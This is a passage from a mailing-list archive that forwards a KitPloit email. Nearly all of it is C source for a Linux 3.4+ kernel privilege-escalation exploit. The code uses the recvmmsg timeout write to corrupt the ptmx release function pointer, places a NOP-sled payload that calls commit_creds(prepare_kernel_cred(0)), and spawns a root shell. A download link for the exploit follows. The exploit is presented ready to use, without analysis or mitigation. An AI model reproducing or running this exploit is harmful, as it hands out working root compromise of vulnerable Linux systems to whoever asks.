 * Match signature of int release(struct inode*, struct file*).
 *
 * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
 */
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred =
(_prepare_kernel_cred)PREPARE_KERNEL_CRED;

    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;    // restore pointer
    commit_creds(prepare_kernel_cred(0));

    return -1;
}

/*
 * Write a zero to the byte at then given address.
 * Only works if the current value is 0xff.
 */
void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;

    srand(time(NULL));

    port = 1024 + (rand() % (0x10000 - 1024));

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    sa.sin_family      = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port        = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base         = buf;
    iovecs.iov_len          = BUFSIZE;
    msgs.msg_hdr.msg_iov    = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;

    /*
     * start a seperate process to send a udp message after 255
seconds so the syscall returns,
     * but not after updating the timout struct and writing the
remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx\n", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);

        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }

        sa.sin_family      = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port        = htons(port);

        printf("waiting 255 seconds...\n");
        for (i = 0; i < 255; i++) {
        if (i % 10 == 0)
                printf("%is/255s\n", i);
        sleep(1);
        }

        printf("waking up parent...\n");
        sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec
struct\n");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out\n");
    } else {
      perror("fork()");
      exit(EXIT_FAILURE);
    }
}

int main(int argc, char** argv)
{
    long code, target;
    int pwn;

    /* Prepare payload... */
    printf("preparing payload buffer...\n");
    code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL),
PAYLOADSIZE, 7, 0x32, 0, 0);
    memset((void*)code, 0x90, PAYLOADSIZE);
    code += PAYLOADSIZE - 1024;
    memcpy((void*)code, &kernel_payload, 1024);

    /*
     * Now clear the three most significant bytes of the fops pointer
     * to the release function.
     * This will make it point into the memory region mapped above.
     */
    printf("changing kernel pointer to point into controlled buffer...\n");
    target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
    zero_out(target + 7);
    zero_out(target + 6);
    zero_out(target + 5);

    /* ... and trigger. */
    printf("releasing file descriptor to call manipulated pointer in
kernel mode...\n");
    pwn = open("/dev/ptmx", 'r');
    close(pwn);

    if (getuid() != 0) {
        printf("failed to get root :(\n");
        exit(EXIT_FAILURE);
    }

    printf("got root, enjoy :)\n");
    return execl("/bin/bash", "-sh", NULL);
}


*Download Exploit Linux 3.4+ Arbitrary
<http://www.exploit-db.com/download/31346>*
   You are subscribed to email updates from KitPloit - The Hacker's
Tools<http://hack-tools.blackploit.com/>
To stop receiving these emails, you may unsubscribe
now<http://feedburner.google.com/fb/a/mailunsubscribe?k=YiWNfEwmdJRFPNu0yBHBNDAy1gk>
. Email delivery powered by Google  Google Inc., 20 West Kinzie, Chicago IL
USA 60610
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://lists.owasp.org/pipermail/owasp-cuiaba/attachments/20140206/9279786f/attachment-0001.html>


More information about the Owasp-cuiaba mailing list